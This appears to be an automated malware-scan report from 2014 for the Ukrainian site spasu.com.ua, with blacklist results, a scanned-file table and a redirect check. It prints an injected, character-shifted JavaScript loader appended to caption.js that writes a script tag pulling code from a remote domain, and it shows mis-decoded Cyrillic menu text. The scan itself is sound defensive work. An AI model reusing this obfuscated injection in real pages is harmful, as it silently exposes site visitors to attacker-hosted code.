Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=spasu.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://spasu.com.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://spasu.com.ua/ | 200 OK Content-Length: 47053 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tentorium.spasu.com.ua ...[33366 bytes skipped]... "> <div id="leftcolumn"> <div class="module"> <div> <div> <div> <h3>Ðлавное менÑ</h3> <ul class="menu"><li id="current" class="active item6"><a href="http://spasu.com.ua/"><span>ÐлавнаÑ</span></a></li><li class="item282"><a href="http://tentorium.spasu.com.ua/"><span>Ðагазин</span></a></li><li class="item243"><a href="/index.php?option=com_content&view=category&id=100&Itemid=243"><span>СÑаÑÑи</span></a></li><li class="item302"><a href="http://spasu.com.ua/1"><span>Ðнлайн игÑÑ</span></a></li><li class="item7"><a href="/index.php?option=com_xmap&sitemap=1&Itemid=7"> ...[20613 bytes skipped]... | ||
http://spasu.com.ua/media/system/js/caption.js | 200 OK Content-Length: 2163 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); <!-- js-tools --> l=0;while(l<90)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00tubgg/psh/vb0benjojtusbups0dpnqpofout0dpn`ti515tfg0tubu/qiq#?=0tdsjqu?'.charCodeAt(l++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://spasu.com.ua/modules/mod_swmenufree/transmenu_Packed.js | 200 OK Content-Length: 11371 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?2285511 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 11840 Content-Type: application/javascript | clean |
http://spasu.com.ua/index.php?option=com_content&view=category&layout=blog&id=14&Itemid=25 | 404 РеÑÑÑÑ Ð½Ðµ найден Content-Length: 1832 Content-Type: text/html | clean |
http://spasu.com.ua/index.php | 200 OK Content-Length: 47053 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tentorium.spasu.com.ua ...[33366 bytes skipped]... "> <div id="leftcolumn"> <div class="module"> <div> <div> <div> <h3>Ðлавное менÑ</h3> <ul class="menu"><li id="current" class="active item6"><a href="http://spasu.com.ua/"><span>ÐлавнаÑ</span></a></li><li class="item282"><a href="http://tentorium.spasu.com.ua/"><span>Ðагазин</span></a></li><li class="item243"><a href="/index.php?option=com_content&view=category&id=100&Itemid=243"><span>СÑаÑÑи</span></a></li><li class="item302"><a href="http://spasu.com.ua/1"><span>Ðнлайн игÑÑ</span></a></li><li class="item7"><a href="/index.php?option=com_xmap&sitemap=1&Itemid=7"> ...[20613 bytes skipped]... | ||
http://spasu.com.ua/index.php?option=com_content&view=category&layout=blog&id=25&Itemid=34 | 404 РеÑÑÑÑ Ð½Ðµ найден Content-Length: 1832 Content-Type: text/html | clean |
http://spasu.com.ua/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://spasu.com.ua/index.php?option=com_content&view=category&id=100&Itemid=243 | 200 OK Content-Length: 40824 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tentorium.spasu.com.ua ...[33616 bytes skipped]... <div id="content"> <div id="leftcolumn"> <div class="module"> <div> <div> <div> <h3>Ðлавное менÑ</h3> <ul class="menu"><li class="item6"><a href="http://spasu.com.ua/"><span>ÐлавнаÑ</span></a></li><li class="item282"><a href="http://tentorium.spasu.com.ua/"><span>Ðагазин</span></a></li><li id="current" class="active item243"><a href="/index.php?option=com_content&view=category&id=100&Itemid=243"><span>СÑаÑÑи</span></a></li><li class="item302"><a href="http://spasu.com.ua/1"><span>Ðнлайн игÑÑ</span></a></li><li class="item7"><a href="/index.php?option=com_xmap&sitemap=1& ...[14395 bytes skipped]... | ||
http://spasu.com.ua/1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 30 Jun 2014 00:58:12 GMT Location: http://spasu.com.ua/1/ Server: nginx/1.0.15 Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 | clean |
http://spasu.com.ua/1/ | 200 OK Content-Length: 27332 Content-Type: text/html | clean |
http://spasu.com.ua/1/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://spasu.com.ua/jquery-1.9.1.min.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |
http://spasu.com.ua/jquery.ui.core.min.js | 404 Not Found Content-Length: 297 Content-Type: text/html | clean |
http://spasu.com.ua/jquery.ui.widget.min.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: spasu.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Mon, 30 Jun 2014 00:58:08 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 30 Jun 2014 00:58:08 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a28642e8ce6b4a6010947b4822fac6f6=9fb9e7ccc51199e8c31bd5d3209dbddf; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: spasu.com.ua
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Mon, 30 Jun 2014 00:58:08 GMT
Pragma: no-cache
Server: nginx/1.0.15
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 30 Jun 2014 00:58:08 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: a28642e8ce6b4a6010947b4822fac6f6=9fb9e7ccc51199e8c31bd5d3209dbddf; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: spasu.com.ua
Referer: http://www.google.com/search?q=spasu.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: spasu.com.ua
Referer: http://www.google.com/search?q=spasu.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.